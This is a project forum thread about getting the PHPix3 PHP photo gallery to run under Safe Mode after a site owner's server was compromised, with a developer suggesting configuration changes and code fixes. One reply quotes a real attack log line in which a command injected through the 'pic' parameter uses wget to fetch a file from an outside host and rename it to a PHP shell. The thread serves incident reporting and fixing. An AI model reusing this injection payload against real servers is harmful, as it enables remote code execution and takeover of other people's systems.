Is it possible to get this script to run when your PHP is running in Safe Mode? I love the script, but people have found a way to use it and installed phpshell on my machine so I had to turn Safe Mode on. Can someone suggest something?
Thank you.
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
I believe this will require more than just changes to the script as it will also require changes to the way the webserver is configured in order for this to work. It will work in save mode but everything has to be owned by the webserver process (I am using apache2 on my test system).
I am going to experiment with the configuration, but to be honest the security approach to ensure you don't have problems is going to require more than just turning on safe mode.
What webserver are you using?
Cheers
David
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
I know there will be some changes required. However when I run the script in other than safemode someone was able to DL phpshell to my machine through this script.
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Was phpshell uploaded to your system using script, or that they got access to phpshell through the script having uploaded via a different means. as as far as I am aware there is no functionality for uploading files through the PHPix3 scripts.
Also could I confirm which webserver software you are using, so that I can check on the way to set it up with PHP safe mode to ensure that the scripts work. As I can make it work in Safe mode but it means that every thing is owned by the webserver process which doesn't really help much
Cheers
David
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Okay, to run this in SAFE MODE (and I will add this to the documentation at some point). You need to use the internal graphics convertion, as you will not be able to run the convert program in the X11 tree ($ImageTool = "int", in config.inc).
You also need to ensure that that everything is owned by either the webserver process owner or the user id in which the web server has been configured to run for that virtual domain.
I am still testing out that exploit that you have reported, It does appear to function on my system, this could be because athe webserver process does not have a shell running with it, but I have located a few areas where this could possibly happen and so will be rewritting that bit of the code.
Cheers
David
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
That is generating thumb nails now but it is very slow and everything is coming out with a blue tint. Any idea why it would do that and how to correct it? Or is there a way or place I can copy the convert program from the X11 tree so that it can be run in safe mode?
Thank you again.
Ben
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
That is what I am currently looking into at the moment. (re. the ext with the safemode setting). I hope to determine a fix soon. The work around is only (I hope) for the short term
The Blue tinit may be due to the GD libraries and a call made to them in 3.0.2 version. I have put a changing 3.0.3 for this, so if you have the latest GD libraries it will use a better call.
Cheers
David
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Please let me know when you find a fix for this as well as the fix for the wget exploit. I am really looking forward to going back to the ext version soon.
Thank you,
Ben
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Still haven't managed to find a way that ext can be used when the environment is in PHP SAFE MODE without in effect turning off all the benefits of SAFE MODE. I will continue looking for an answer however
Cheers
David
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Just checking back to see if there was any progress. I really do not want to enable safemode again because of the problems I was having.
Thank you,
Ben
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Still considering the options. It looks like the best why is to configure that PHP environment in a suitable way to allow save but secure access to the required applications, but this still needs to be checked out
David
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Thank you for getting back to me on this. If I were to turn off safemode, is there a way to prevent someone from dling files to the server using this script as has happened in the past?
Thank you,
Ben
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
I made major modification on something calles "PHPIX" (on my debian-sarge system), that now works in safemode.. take a look on my homepage: http://phoohb.shellkonto.se/pbpix/
I don't know if this is the right gallery or phpix2 (strange)..
There are noo example gallery on your project page, -bad.
ANY IDEER..??
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
(strange I didn't get any e-mail when you reply.. Im a newbie..)
In short I did these changes ( for the "SAFEMODE"):
-Only use (php's) gd as image creating.
-Used (php's) "ftp" connection to create subfolders, with proper owner.
I also changed other things, for other purpose..
If you are interested I can zip the whole programtree and send it to you (but may not work rightoftheblue..)?
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Hmm.. I just tested this exploit on the old PHPix2 codebase, and it doesn't work there. It must have been a change introduced by your modifications?
As an aside, I'm just about to checkin a version of phpix2 that untaints (makes sure there are no shell useable characters) all it's input, and also works under register_globals=off.
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Is it possible to get this script to run when your PHP is running in Safe Mode? I love the script, but people have found a way to use it and installed phpshell on my machine so I had to turn Safe Mode on. Can someone suggest something?
Thank you.
I will have a look and see what I can do to have it run with safe mode turned on.
Watch this space
Cheers
David
Thank you. I love the script but I can not run PHP without being in safe mode. I will look forward to hearing from you.
Thank you,
Ben
I believe this will require more than just changes to the script as it will also require changes to the way the webserver is configured in order for this to work. It will work in save mode but everything has to be owned by the webserver process (I am using apache2 on my test system).
I am going to experiment with the configuration, but to be honest the security approach to ensure you don't have problems is going to require more than just turning on safe mode.
What webserver are you using?
Cheers
David
I know there will be some changes required. However when I run the script in other than safemode someone was able to DL phpshell to my machine through this script.
Was phpshell uploaded to your system using script, or that they got access to phpshell through the script having uploaded via a different means. as as far as I am aware there is no functionality for uploading files through the PHPix3 scripts.
Also could I confirm which webserver software you are using, so that I can check on the way to set it up with PHP safe mode to ensure that the scripts work. As I can make it work in Safe mode but it means that every thing is owned by the webserver process which doesn't really help much
Cheers
David
I am running apache2 on the server also. As far as them downloading phpshell. Here is the exact line from the log where they downloaded the file.
/pictures/view.php?album=Joey&pic=%60wget%20-P%20cache%20http://titanix.net:8095/~ivan/5.txt%20;%20mv%20cache/5.txt%20cache/6.php%20%60&dispsize=&start=0&picindex=2
from there they were able to run phpshell and downloaded more programs.
Please advise.
Thank you,
Ben
Cheers, I will look into this at once
thank you.
Okay, to run this in SAFE MODE (and I will add this to the documentation at some point). You need to use the internal graphics convertion, as you will not be able to run the convert program in the X11 tree ($ImageTool = "int", in config.inc).
You also need to ensure that that everything is owned by either the webserver process owner or the user id in which the web server has been configured to run for that virtual domain.
I am still testing out that exploit that you have reported, It does appear to function on my system, this could be because athe webserver process does not have a shell running with it, but I have located a few areas where this could possibly happen and so will be rewritting that bit of the code.
Cheers
David
That is generating thumb nails now but it is very slow and everything is coming out with a blue tint. Any idea why it would do that and how to correct it? Or is there a way or place I can copy the convert program from the X11 tree so that it can be run in safe mode?
Thank you again.
Ben
That is what I am currently looking into at the moment. (re. the ext with the safemode setting). I hope to determine a fix soon. The work around is only (I hope) for the short term
The Blue tinit may be due to the GD libraries and a call made to them in 3.0.2 version. I have put a changing 3.0.3 for this, so if you have the latest GD libraries it will use a better call.
Cheers
David
Please let me know when you find a fix for this as well as the fix for the wget exploit. I am really looking forward to going back to the ext version soon.
Thank you,
Ben
Any changes yet?
Still haven't managed to find a way that ext can be used when the environment is in PHP SAFE MODE without in effect turning off all the benefits of SAFE MODE. I will continue looking for an answer however
Cheers
David
Just checking back to see if there was any progress. I really do not want to enable safemode again because of the problems I was having.
Thank you,
Ben
Still considering the options. It looks like the best why is to configure that PHP environment in a suitable way to allow save but secure access to the required applications, but this still needs to be checked out
David
Thank you for getting back to me on this. If I were to turn off safemode, is there a way to prevent someone from dling files to the server using this script as has happened in the past?
Thank you,
Ben
Hello folks!
I made major modification on something calles "PHPIX" (on my debian-sarge system), that now works in safemode.. take a look on my homepage: http://phoohb.shellkonto.se/pbpix/
I don't know if this is the right gallery or phpix2 (strange)..
There are noo example gallery on your project page, -bad.
ANY IDEER..??
What changes did you make, If they were for PHPix2 then I can include them in this version, if they are for this version I can update the code
(The whole project page is under construction at the moment)
Cheers
David
(strange I didn't get any e-mail when you reply.. Im a newbie..)
In short I did these changes ( for the "SAFEMODE"):
-Only use (php's) gd as image creating.
-Used (php's) "ftp" connection to create subfolders, with proper owner.
I also changed other things, for other purpose..
If you are interested I can zip the whole programtree and send it to you (but may not work rightoftheblue..)?
Hmm.. I just tested this exploit on the old PHPix2 codebase, and it doesn't work there. It must have been a change introduced by your modifications?
As an aside, I'm just about to checkin a version of phpix2 that untaints (makes sure there are no shell useable characters) all it's input, and also works under register_globals=off.
Have you confirmed it with the latest release as this version untaints
All the PHPix3 releases have worked with register_globals=off (By default).